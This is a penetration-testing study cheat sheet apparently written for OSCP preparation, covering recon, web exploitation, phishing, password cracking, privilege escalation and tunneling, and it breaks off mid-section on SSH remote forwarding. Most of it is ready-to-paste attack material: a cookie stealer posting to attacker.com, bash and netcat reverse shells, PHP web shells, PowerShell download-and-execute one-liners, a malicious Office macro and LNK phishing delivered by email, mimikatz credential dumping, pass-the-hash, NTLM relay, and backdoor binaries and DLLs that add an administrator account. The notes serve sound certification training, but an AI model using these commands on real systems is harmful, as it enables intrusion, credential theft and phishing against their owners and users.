bebop404

OSCP Preparation Notes

A working reference built while preparing for OSCP — copy-paste-ready commands and mental models covering recon, web attacks, PE, tunneling, and Active Directory.

This is the reference I compiled while going through the PWK course and grinding OSCP labs. It covers the full exam scope: passive and active recon, web exploitation, client-side attacks, credential cracking, privilege escalation on both Windows and Linux, port tunneling, and Active Directory attacks — distilled into commands I actually used, with just enough context to remember why each technique works.

Think of it as a living cheat sheet, not a tutorial. If something is here, I hit it in a lab or the exam.


Sections

Recon
Passive + active, DNS, Nmap, SMB, SNMP
Web Attacks
XSS, SQLi, LFI/RFI, upload, command injection
Client-side
Macros, library files, file delivery, SMTP
Passwords
Hydra, Hashcat, NTLM, PtH, NTLMv2 relay
Windows PE
Services, DLL hijack, scheduled tasks, tokens
Linux PE
SUID, sudo, cron, capabilities, kernel
Tunneling
SSH local/remote/dynamic, socat, sshuttle, Plink
DPI Bypass
ligolo-ng, chisel, DNS tunneling (dnscat2)
Active Directory
Enum, Kerberoast, Silver/Golden tickets, DCSync
Lateral Movement
WMI, WinRM, PsExec, PtH, Pass the Ticket, DCOM

Shell Setup

Interactive shell upgrade:

sudo rlwrap -cAr nc -lnvp [port]

Upgrade to full TTY:

script /dev/null -c /bin/bash
# CTRL+Z
stty raw -echo; fg
# press Enter twice, then:
export TERM=xterm

SSH without host key verification:

ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" learner@192.168.50.52

UserKnownHostsFile=/dev/null stops key recording. StrictHostKeyChecking=no skips authenticity verification — useful in labs, dangerous in production.


Information Gathering

Passive

Whois: whois [domain] -h [host]
Google dorks: site: filetype: ext: intitle: (combine with "")
Subdomains: Netcraft → site report
GitHub: owner: path:
Shodan: hostname: port:
TLS/Headers: securityheaders.com · Qualys SSLLabs

Active — DNS Enumeration

Record types: NS A AAAA MX PTR CNAME TXT

host [domain]
host -t mx [domain]
host -t txt [domain]

Brute-force forward DNS with DnsRecon:

dnsrecon -d [domain] -t std
dnsrecon -d [domain] -D /usr/share/seclists/Discovery/DNS/namelist.txt -t brt

Windows nslookup:

nslookup -type=TXT [domain] [nameserver]

Active — Port Scanning

All TCP ports (fast):

sudo nmap --min-rate 10000 -p- {ip} -oA nmap/ports

Extract open ports for the next scan:

cat ports.nmap | grep open | awk -F '/' '{print $1}' | tr '\n\r' ','
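Added here as an example (not part of the original notes): a Python parser for the ports.nmap and ports.gnmap files that -oA writes. Unlike a bare grep for "open", it keeps only ports whose state is exactly open (so UDP open|filtered results are not swept in) and emits a list without the trailing comma the tr pipeline leaves. The sample scan output below is constructed.

```python
import re

# Constructed sample of nmap "normal" output (ports.nmap), as written by -oA.
SAMPLE_NMAP = """\
# Nmap 7.94 scan initiated Mon Jan  1 10:00:00 2024 as: nmap --min-rate 10000 -p- -oA nmap/ports 10.0.0.5
Nmap scan report for 10.0.0.5
Host is up (0.0010s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE         SERVICE
22/tcp    open          ssh
80/tcp    open          http
135/tcp   filtered      msrpc
445/tcp   open          microsoft-ds
3389/tcp  open          ms-wbt-server
5985/tcp  open|filtered wsman

# Nmap done at Mon Jan  1 10:00:05 2024 -- 1 IP address (1 host up) scanned in 5.00 seconds
"""

# Constructed sample of the grepable output (ports.gnmap) from the same -oA run.
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated Mon Jan  1 10:00:00 2024 as: nmap --min-rate 10000 -p- -oA nmap/ports 10.0.0.5
Host: 10.0.0.5 ()\tStatus: Up
Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 135/filtered/tcp//msrpc///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///, 5985/open|filtered/tcp//wsman///\tIgnored State: closed (65529)
# Nmap done at Mon Jan  1 10:00:05 2024 -- 1 IP address (1 host up) scanned in 5.00 seconds
"""

# Normal output: "22/tcp    open    ssh". The state must be exactly "open" followed by
# whitespace, so "open|filtered" does not match the way it does with a plain grep.
NORMAL_LINE = re.compile(r"^(\d{1,5})/(tcp|udp)\s+open\s")
# Grepable output packs every port into one "Ports:" field as port/state/proto//svc///.
GREPABLE_PORT = re.compile(r"(\d{1,5})/open/(tcp|udp)/")


def open_ports_normal(text: str) -> list[int]:
    """Ports whose state is exactly 'open' in nmap normal (.nmap) output."""
    ports = set()
    for line in text.splitlines():
        m = NORMAL_LINE.match(line)
        if m:
            ports.add(int(m.group(1)))
    return sorted(ports)


def open_ports_grepable(text: str) -> list[int]:
    """Ports whose state is exactly 'open' in nmap grepable (.gnmap) output."""
    ports = set()
    for line in text.splitlines():
        if "Ports:" not in line:
            continue
        for port, _proto in GREPABLE_PORT.findall(line):
            ports.add(int(port))
    return sorted(ports)


def port_list(ports) -> str:
    """Format for nmap -p: comma-separated, no trailing comma."""
    return ",".join(str(p) for p in ports)


if __name__ == "__main__":
    # Both formats from the same scan must agree; print the -p argument for the next scan.
    print(port_list(open_ports_normal(SAMPLE_NMAP)))
```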

Version + OS scan on open ports:

sudo nmap -sT -sV -O -p{ports} {ip}

Top 100 UDP:

sudo nmap -sU --top-ports 100 {ip}

PowerShell TCP scan (no Nmap):

1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.50.151",$_)) "TCP port $_ is open"} 2>$null

Active — SMB Enumeration (ports 139, 445)

nmap -v -p 139,445 --script smb-os-discovery {ip}
crackmapexec smb smb.txt -u "alfred" -p "" --shares --rid-brute

List shares (Windows and Linux):

net view \\dc01 /all

Active — SMTP (port 25)

nc -nv [ip] 25
VRFY [username]

Active — SNMP (UDP 161)

sudo nmap -sU --open -p 161 192.168.50.1-254 -oG open-snmp.txt
onesixtyone -c community -i ips
snmpwalk -c public -v1 -t 10 192.168.50.151
snmpwalk -c public -v 1 192.168.50.151 [MIB]
snmpwalk -v X -c public [IP] NET-SNMP-EXTEND-MIB::nsExtendOutputFull

Useful Windows SNMP MIBs:

OID                         Information
1.3.6.1.2.1.25.1.6.0        System Processes
1.3.6.1.2.1.25.4.2.1.2      Running Programs
1.3.6.1.2.1.25.4.2.1.4      Processes Path
1.3.6.1.2.1.25.2.3.1.4      Storage Units
1.3.6.1.2.1.25.6.3.1.2      Software Name
1.3.6.1.4.1.77.1.2.25       User Accounts
1.3.6.1.2.1.6.13.1.3        TCP Local Ports

Vulnerability Scanning

Nessus

sudo systemctl start nessusd.service
# Go to https://127.0.0.1:8834

Nmap NSE

nmap -sV --script "vuln" {ip}
# Custom .nse: copy to /usr/share/nmap/scripts/ then --script [script-name]

Web Application Attacks

API Enumeration

gobuster dir -u {url} -w /usr/share/wordlists/dirb/big.txt -p pattern.txt
# pattern.txt:
# {GOBUSTER}/v1
# {GOBUSTER}/v2

Don't forget robots.txt and sitemap.xml.

curl flags: -d POST · -H header · -i include response headers · -X method · -L follow redirect

XSS

Common test characters: < > ' " { } ;

Encode a large JS payload to bypass filters:

function encode_to_javascript(string) {
    var input = string;
    var output = '';
    for (var pos = 0; pos < input.length; pos++) {
        output += input.charCodeAt(pos);
        if (pos != (input.length - 1)) output += ",";
    }
    return output;
}
let encoded = encode_to_javascript('insert_minified_javascript')
console.log(encoded)

Execute encoded payload:

<script>eval(String.fromCharCode(118,97,....))</script>

Cookie stealer test:

<img src="https://attacker.com/?cookie="+btoa(document.cookie)>

Minify JS at JScompress before encoding.

Directory Traversal

../../../../etc/passwd
../../../../home/offsec/.ssh/id_rsa

Windows: use ..\ instead. Sensitive IIS config: C:\inetpub\wwwroot\web.config.

Encoding: .%2e decodes to .. (URL-encoded dot). Use curl --path-as-is so curl keeps the ../ sequences instead of squashing them; --data-urlencode for POST values.

LFI

Include a file in the app's running code → execution:

<?php echo system($_GET['cmd']); ?>

Poison access.log via User-Agent, then:

?page=../../../../../var/log/apache2/access.log&cmd=ls+-la

Linux reverse shell via LFI:

bash -c "bash -i >& /dev/tcp/192.168.119.3/4444 0>&1"

PHP Wrappers:

# Read source without executing
?page=php://filter/resource=admin.php
?page=php://filter/convert.base64-encode/resource=admin.php
 
# RCE via data:// (requires allow_url_include)
?page=data://text/plain,<?php%20echo%20system('ls');?>
?page=data://text/plain;base64,PD9waHAgZW...&cmd=ls

RFI

Requires allow_url_include=On:

<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    system($_REQUEST['cmd']);
    echo "</pre>"; die;
}
?>
# Host file then:
?page=http://192.168.119.3/simple-backdoor.php&cmd=ls

File Upload

Extension bypasses: .phps · .php7 · .phtml · .pHP

Create Windows reverse shell payload:

$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);...'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText = [Convert]::ToBase64String($Bytes)
$EncodedText

Execute via upload:

curl http://target/uploads/simple-backdoor.pHP?cmd=powershell%20-enc%20JABjAGwA...

Non-executable upload — overwrite authorized_keys:

ssh-keygen
cat fileup.pub > authorized_keys
# upload to ../../../root/.ssh/authorized_keys
ssh -p 2222 -i fileup root@target.com

Kali web shells

Pre-built web shells live at /usr/share/webshells — ready to upload without modification.

Command Injection

Git bypass: append %3b (;) after the version string.

Check execution environment:

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

Powercat reverse shell via command injection:

IEX (New-Object System.Net.Webclient).DownloadString("http://192.168.45.201/powercat.ps1");powercat -c 192.168.45.201 -p 443 -e powershell

URL-encode and send via curl -X POST.

SQL Injection

MySQL basics:

mysql -u root -p'root' -h 192.168.50.16 -P 3306
select version(); select system_user(); show databases;
SELECT user, authentication_string FROM mysql.user WHERE user = 'offsec';

MSSQL basics:

impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
SELECT @@version;
SELECT name FROM sys.databases;
SELECT * FROM offsec.information_schema.tables;

Error-based:

' OR 1=1 -- //
' OR 1=1 in (select @@version) -- //

Union-based — find column count:

' ORDER BY 1 -- //
' ORDER BY 2 -- //   (increment until error)

Union enumeration:

' UNION SELECT database(), user(), @@version, null, null -- //
' union select null, table_name, column_name, table_schema, null
    from information_schema.columns where table_schema=database() -- //
' UNION SELECT null, username, password, description, null FROM users -- //

Blind SQLi:

' AND 1=1 -- //
' AND IF (1=1, sleep(3),'false') -- //

MSSQL code execution:

EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';

Write PHP webshell via SQLi:

' UNION SELECT "<?php system($_GET['cmd']);?>",null,null,null,null
    INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //

sqlmap (noisy — last resort):

sqlmap -u http://target/blindsqli.php?user=1 -p user
sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp"
sqlmap -u "..." --sql-query "{query}"

Client-side Attacks

Metadata extraction:

exiftool -a -u [file]   # → Create Date, Modify Date, Author

Browser fingerprinting: Canarytokens — grab browser, IP, OS from a target click.

Microsoft Office Macros

Files: .docm or .doc. View → Macro → create. Macro runs on open:

Sub AutoOpen()
    MyMacro
End Sub
Sub Document_Open()
    MyMacro
End Sub
Sub MyMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
    Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
    ' ... (split base64 with python script below)
    Str = Str + "A== "
    CreateObject("Wscript.Shell").Run Str
End Sub

Python helper to split base64 into 50-char VBA strings:

payload = "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdw..."
n = 50   # chunk size for each VBA string literal
for i in range(0, len(payload), n):
    print('Str = Str + "' + payload[i:i+n] + '"')

File Transfer Methods

certutil:

certutil -encode inputFile encodedFile
certutil -decode encodedFile outputFile
certutil -urlcache -split -f "http://kali/file" output_file

SMB share:

# Kali:
impacket-smbserver test . -smb2support -username user -password pass
# Windows:
net use m: \\KaliIP\test /user:user pass
copy mimikatz.log m:\

Netcat:

# Receiver:
nc -l -p 1234 > received_file.zip
# Sender:
nc -w 3 [kali] 1234 < out.file

xfreerdp drive mount:

xfreerdp /cert-ignore /u:offsec /p:lab /v:192.168.212.250 /drive:test,/home/kali/
# Windows:
copy mimikatz.log \\tsclient\test\mimikatz.log

PowerShell HTTP server:

$listener = [System.Net.HttpListener]::new()
$listener.Prefixes.Add("http://*:80/")
$listener.Start()
while ($listener.IsListening) {
    $context = $listener.GetContext()
    $response = $context.Response
    $filePath = $context.Request.Url.LocalPath.Substring(1)
    if (Test-Path $filePath) {
        $fileBytes = [System.IO.File]::ReadAllBytes($filePath)
        $response.ContentLength64 = $fileBytes.Length
        $response.OutputStream.Write($fileBytes, 0, $fileBytes.Length)
    } else { $response.StatusCode = 404 }
    $response.OutputStream.Close()
}

Windows Library + LNK Phishing

Set up a WebDAV share:

pip3 install wsgidav
mkdir /home/kali/webdav
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/

config.Library-ms content (point to your WebDAV URL):

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
  <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
  <searchConnectorDescription>
    <isDefaultSaveLocation>true</isDefaultSaveLocation>
    <isSupported>false</isSupported>
    <simpleLocation>
      <url>http://192.168.45.240</url>
    </simpleLocation>
  </searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

LNK shortcut target (automatic_configuration):

powershell.exe -nop -w hidden -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.173:8000/powercat.ps1'); powercat -c 192.168.45.173 -p 443 -e powershell"

Deliver via SMB:

smbclient //192.168.159.195/share -c 'put config.Library-ms'

Send Malicious Email (SMTP port 25)

sudo swaks -t target@corp.com --from attacker@corp.com \
  --attach @config.Library-ms --server 192.168.159.199 \
  --body @body.txt --header "Subject: IT Setup" --suppress-data -ap

Public Exploits

Online: Exploit-DB · PacketStorm · GitHub

firefox --search "Microsoft Edge site:exploit-db.com"

Offline (searchsploit):

sudo apt update && sudo apt install exploitdb
searchsploit [service name]
searchsploit [name] -m [EDB-ID]    # copy to current dir

Nmap NSE exploits:

grep Exploits /usr/share/nmap/scripts/*.nse
nmap --script-help=clamav-exec.nse

Always check before running

Read exploit code before executing. A newer app version doesn't mean it's not vulnerable — patches are often incomplete. The version the exploit author used may differ from yours; test locally first.

Fixing Exploits

Buffer Overflow

Avoid DoS exploits when better alternatives exist. Focus on shellcode replacement.

Cross-compile for Windows on Kali:

sudo apt install mingw-w64
i686-w64-mingw32-gcc 42341.c -o exploit.exe
i686-w64-mingw32-gcc 42341.c -o exploit.exe -lws2_32   # if linker error

Generate custom shellcode (respecting bad chars from the PoC):

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.4 LPORT=443 \
  EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"

Web Exploits Checklist

  • HTTP vs HTTPS? Which route? Pre-auth or authenticated?
  • Default credentials? Self-signed cert → add verify=False to requests
  • Python 2 → 3 conversion: sudo apt install 2to3 && 2to3 file.py -w
  • Base64 in Python 3: convert between str and bytes with .encode('UTF-8') and .decode('UTF-8')

Password Attacks

SSH & RDP Brute Force

hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201
hydra -L names.txt -p "SuperS3cure1337#" rdp://192.168.50.202

Flags: -s port · -L/-l user list/user · -P/-p pass list/pass · -R resume

HTTP POST Form

hydra -l user -P rockyou.txt 192.168.50.201 \
  http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed"

For Basic Auth (http-get), grab the raw request from Burp, replace newlines with \r\n:

# vim: :%s/\n/\\r\\n/g
hydra -L userlist.txt -P passlist.txt 192.168.229.201 http-get / \
  -m "GET / HTTP/1.1\r\nHost: ...\r\nAuthorization: Basic ^USER^:^PASS^\r\n\r\n" -f

Hashcat

hashcat [hash] [dictionary] -m [type] -a [mode] -r [rule]
hashcat --help | grep -i "KeePass"
echo \$1 > demo.rule   # append "1" to every candidate

Rule syntax: c = capitalise · u d = uppercase then duplicate (functions on one line run in sequence) · more rule files under /usr/share/hashcat/rules/
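An added example, not from the notes: a small Python previewer for the subset of hashcat's rule language used here ($X, ^X, c, u, d, sXY and a few others), to check what a rule line does to a candidate before committing to a long run. DEMO_RULES is a constructed rule file in the style of demo.rule above, and the test word is a single constructed candidate.

```python
# Hashcat semantics reproduced here: functions on one line run left to right and
# spaces between them are ignored; each non-comment line of a rule file is a
# separate rule, so a file with N rule lines yields N candidates per dictionary word.
# Positional functions (D, x, i, o ...) are not implemented; unknown functions raise.

def apply_rule(rule: str, word: str) -> str:
    """Apply one hashcat rule line to one candidate word."""
    out = word
    rule = rule.strip()
    i = 0
    while i < len(rule):
        f = rule[i]
        if f == " ":                  # separator between functions, no effect
            i += 1
            continue
        if f == ":":                  # no-op: pass the word unchanged
            pass
        elif f == "l":
            out = out.lower()
        elif f == "u":
            out = out.upper()
        elif f == "c":                # capitalise: first upper, rest lower
            out = out[:1].upper() + out[1:].lower()
        elif f == "C":                # inverse capitalise
            out = out[:1].lower() + out[1:].upper()
        elif f == "t":                # toggle case
            out = out.swapcase()
        elif f == "r":                # reverse
            out = out[::-1]
        elif f == "d":                # duplicate
            out = out + out
        elif f == "f":                # reflect: word + reversed word
            out = out + out[::-1]
        elif f == "{":                # rotate left
            out = out[1:] + out[:1]
        elif f == "}":                # rotate right
            out = out[-1:] + out[:-1]
        elif f == "[":                # delete first character
            out = out[1:]
        elif f == "]":                # delete last character
            out = out[:-1]
        elif f == "$":                # $X: append X (X may itself be a space)
            i += 1
            out = out + rule[i]
        elif f == "^":                # ^X: prepend X
            i += 1
            out = rule[i] + out
        elif f == "s":                # sXY: replace every X with Y
            out = out.replace(rule[i + 1], rule[i + 2])
            i += 2
        else:
            raise ValueError(f"unsupported rule function {f!r} in {rule!r}")
        i += 1
    return out


def expand(rule_file: str, word: str) -> list[str]:
    """Apply every rule line of a rule file (comments start with '#') to one word."""
    results = []
    for line in rule_file.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        results.append(apply_rule(line, word))
    return results


# Constructed rule file: the demo.rule line from the notes plus a few more.
DEMO_RULES = """\
# append 1 / capitalise / uppercase then duplicate / capitalise + suffix / substitutions
$1
c
u d
c $1 $!
sa@ so0
"""

if __name__ == "__main__":
    for candidate in expand(DEMO_RULES, "password"):
        print(candidate)
```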

Identify hash type: hash-identifier or hashid

KeePass (.kdbx):

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
# keepass2john → remove first col → hashcat mode 13400
hashcat -m 13400 keepass.hash rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force

SSH Private Key:

ssh2john id_rsa > ssh.hash   # remove first col
sudo sh -c 'cat ssh.rule >> /etc/john/john.conf'
john --wordlist=ssh.passwords --rules=sshRules ssh.hash

Cracking NTLM

Requires Administrator + SeDebugPrivilege:

# In mimikatz:
privilege::debug
token::elevate
lsadump::sam
 
# One-liner:
mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" \
  "lsadump::cache" "lsadump::sam" "sekurlsa::ekeys" "lsadump::lsa /inject" "exit"

NTLM → hashcat mode 1000. MsCacheV2 → format $DCC2$10240#username#hash → mode 2100.

Pass-the-Hash

smbclient \\\\192.168.50.212\\secrets -U Administrator \
  --pw-nt-hash 7a38310ea6f0027ee955abed1762964b
 
impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b \
  Administrator@192.168.164.212
 
impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b \
  Administrator@192.168.50.212

Net-NTLMv2 Capture & Relay

Capture:

sudo responder -I tun0
# Target does: dir \\[kali-ip]\test  → triggers auth
# Web app trick: change filename to UNC path with double backslash

Crack captured hash with hashcat mode 5600.

Relay (if can't crack):

impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 \
  -c "powershell -enc JABjAGwAaQBlAG4AdA..."
# Host1 does: dir \\[kali]\test → shell arrives from Host2

Condition: UAC remote restrictions disabled or local administrator on target.


Windows Privilege Escalation

Situation Awareness

whoami /groups                          # current user groups
net user [user]
Get-LocalUser; net user                 # all local users
Get-LocalGroup; net localgroup          # all local groups
Get-LocalGroupMember [Group]
systeminfo                              # OS, version, arch
ipconfig /all; route print; netstat -ano
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-Process
Get-Process -Name "[name]" | select *

Sensitive File Hunting

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue

PowerShell History

Get-History
(Get-PSReadlineOption).HistorySavePath
type C:\Users\dave\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

PuTTY saved sessions:

reg query "HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions"

Interactive shell as another user: runas /user:[username] cmd

PS-Session:

$password = ConvertTo-SecureString "pass" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("daveadmin",$password)
Enter-PSSession -ComputerName CLIENTWK220 -Credential $cred

Evil-WinRM: evil-winrm -i 192.168.50.220 -u daveadmin -p "pass"

Automation

# WinPEAS
iwr -uri http://192.168.118.2/winPEASx64.exe -Outfile winPEAS.exe
.\winPEAS.exe
 
# SeatBelt
.\Seatbelt.exe -group=all

Service Binary Hijacking

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

Check write permissions: icacls [path] (F = Full, M = Modify, W = Write, RX = Read + execute)

Malicious adduser.c:

#include <stdlib.h>
int main() {
    system("net user ivan password123! /add");
    system("net localgroup administrators ivan /add");
    return 0;
}
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

Replace binary → restart service:

iwr -uri http://192.168.119.3/adduser.exe -Outfile adduser.exe
move C:\xampp\mysql\bin\mysqld.exe mysqld.exe
move .\adduser.exe C:\xampp\mysql\bin\mysqld.exe
net stop mysql

If SeShutdownPrivilege available: shutdown /r /t 0

RunasCs for admin shell (if user is in Administrators group):

RunasCs.exe ivan password123! cmd.exe -r 192.168.45.213:443

Service DLL Hijacking

# Enumerate services → check icacls → use Procmon to find the missing DLL
$env:path    # check for writable directories in PATH
Restart-Service [service-name]

myDLL.cpp:

#include <stdlib.h>
#include <windows.h>
BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            system("net user ivan password123! /add");
            system("net localgroup administrators ivan /add");
            break;
    }
    return TRUE;
}
x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll
# Or via msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.225 LPORT=443 -f dll -o svc.dll

Unquoted Service Path

Find services with spaces and no quotes:

Get-CimInstance -ClassName win32_service | Select Name,State,PathName
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """"

Example path → execution order:

C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe
→ C:\Program.exe
→ C:\Program Files\Enterprise.exe
→ C:\Program Files\Enterprise Apps\Current.exe   ← plant here

Check write permissions on each dir level → upload malicious binary → Start-Service.
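As an added example (not from the notes), a Python audit helper that generalises the execution order above: given PathName values in the shape Get-CimInstance win32_service returns, it flags unquoted paths containing spaces, lists the <prefix>.exe files Windows probes before reaching the real binary, and names the directories whose ACLs (icacls) decide whether the finding matters. The service names and paths in SAMPLE_SERVICES are constructed.

```python
import ntpath  # Windows path semantics even when this runs on Linux

# Constructed (Name, PathName) rows in the shape of
# Get-CimInstance -ClassName win32_service | Select Name,PathName
SAMPLE_SERVICES = [
    ("GammaServ", r"C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe"),
    ("BetaServ", r'"C:\Program Files\Beta\BetaServ.exe" -service'),   # quoted: safe
    ("AlphaSvc", r"C:\Tools\alphasvc.exe --mode background"),         # spaces only in args
    ("Spooler", r"C:\Windows\System32\spoolsv.exe"),                  # no spaces
]


def is_unquoted_with_spaces(path_name: str) -> bool:
    """True when the image path is not wrapped in quotes and contains a space,
    which is what forces CreateProcess to guess where the executable name ends."""
    path_name = path_name.strip()
    return not path_name.startswith('"') and " " in path_name


def hijack_candidates(path_name: str) -> list[str]:
    """Paths Windows probes, in order, before the intended binary.

    CreateProcess splits an unquoted command line at each space and tries
    <prefix>.exe for every prefix, so for
      C:\\Program Files\\Enterprise Apps\\Current Version\\GammaServ.exe
    it tries C:\\Program.exe, then C:\\Program Files\\Enterprise.exe, and so on.
    """
    if not is_unquoted_with_spaces(path_name):
        return []
    tokens = path_name.strip().split(" ")
    candidates = []
    for i in range(1, len(tokens)):
        prefix = " ".join(tokens[:i])
        # Once a prefix already names an .exe, the remaining tokens are arguments
        # to the real binary and there is nothing left to plant.
        if prefix.lower().endswith(".exe"):
            break
        candidates.append(prefix + ".exe")
    return candidates


def dirs_to_audit(path_name: str) -> list[str]:
    """Directories whose write permission decides whether a candidate can be
    planted: these are the paths to feed to icacls (or Get-Acl) when auditing."""
    return sorted({ntpath.dirname(c) for c in hijack_candidates(path_name)})


def audit(services) -> dict[str, list[str]]:
    """Map each service with an exploitable-looking PathName to its candidate files."""
    findings = {}
    for name, path_name in services:
        cands = hijack_candidates(path_name)
        if cands:
            findings[name] = cands
    return findings


if __name__ == "__main__":
    for name, cands in audit(SAMPLE_SERVICES).items():
        print(f"{name}:")
        for c in cands:
            print(f"  probes {c}")
        print(f"  check ACLs on: {', '.join(dirs_to_audit(dict(SAMPLE_SERVICES)[name]))}")
```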

Automation with PowerUp

iwr -uri http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1
powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\studentx'
Get-UnquotedService

Scheduled Tasks

Get-ScheduledTask
schtasks /query /fo LIST /v
schtasks /query /fo LIST /v | findstr /i 'Author'

Check binary permissions → replace with malicious → wait for execution.

SeImpersonatePrivilege

IIS workers (LocalService, NetworkService, ApplicationPoolIdentity) all have this.

.\PrintSpoofer64.exe -i -c powershell.exe
# → NT AUTHORITY\SYSTEM

Windows PE Tools

FullPowers: restore default token privileges for service accounts
RunasCs: run commands as another user with credentials
GodPotato: SeImpersonatePrivilege → SYSTEM: GodPotato -cmd "cmd /c whoami"
WinPEAS: automated Windows PE enumeration
SeatBelt: .\Seatbelt.exe -group=all

Linux Privilege Escalation

Basic Enumeration

id; cat /etc/passwd; hostname
cat /etc/issue; cat /etc/os-release; uname -a
ps aux; ip a; routel; netstat -ano; ss -anp
cat /etc/iptables/rules.v4
dpkg -l
find / -writable -type d 2>/dev/null
cat /etc/fstab; mount; lsblk
lsmod; /sbin/modinfo [module]

Automated:

unix-privesc-check standard > output.txt
# Also: LinEnum, LinPEAS

Exposed Credentials

env; cat ~/.bashrc
find . -type f -name "*.xml" -exec grep -ri "password" {} +
crunch 6 6 -t Lab%%% > wordlist    # generate custom wordlist
hydra -l eve -P wordlist 192.168.50.214 -t 4 ssh -V

Monitor running processes:

watch -n 1 "ps aux | grep pass"
sudo tcpdump -i lo -A | grep "pass"

Cron Jobs

grep "CRON" /var/log/syslog
ls -lah /etc/cron*; crontab -l; cat /etc/crontab

If you have write permission to a cron script:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.118.2 1234 >/tmp/f" >> [script]

Writable /etc/passwd

openssl passwd password123!
echo 'root2:$1$w6X9xROw$Y0CB8xl.M80jVxE/utQwb.:0:0:root:/root:/bin/bash' >> /etc/passwd
su root2   # password: password123!

SUID / Capabilities

find / -perm -u=s -type f 2>/dev/null
find / -perm -04000 -type f 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null

→ Check GTFOBins for abuse methods.

Sudo

sudo -l            # see allowed commands for current user
sudo -V            # check for vulnerable versions (e.g., 1.8.31)

GTFOBins sudo filter.

Kernel Exploits

cat /etc/issue; uname -r; arch
# searchsploit [kernel version]
# e.g. Build 22621 → CVE-2023-29360

Port Redirection & SSH Tunneling

Concepts: WAN = wide area network · DMZ = buffer network between external and internal hosts

ip a; ip route     # check interfaces and routes

socat Port Forward (Linux)

Forward 192.168.x:2345 → 10.4.x:5432:

socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432

SSH Local Port Forward

# On the jump host: expose [target]:445 on the jump host's port 4455 (kali then connects to jumphost:4455)
ssh -N -L 0.0.0.0:4455:[target]:445 username@[ssh-server]

Example — enumerate SMB through the tunnel:

smbclient -p 4455 -L //192.168.50.63/ -U hr_admin --password=Welcome1234

SSH Dynamic Port Forward (SOCKS)

# On jump host:
ssh -N -D 0.0.0.0:9999 username@[ssh-server]
# kali /etc/proxychains4.conf: add "socks5 192.168.50.63 9999"
proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.50.217

SSH Remote Port Forward

# On target (push a port back to kali):
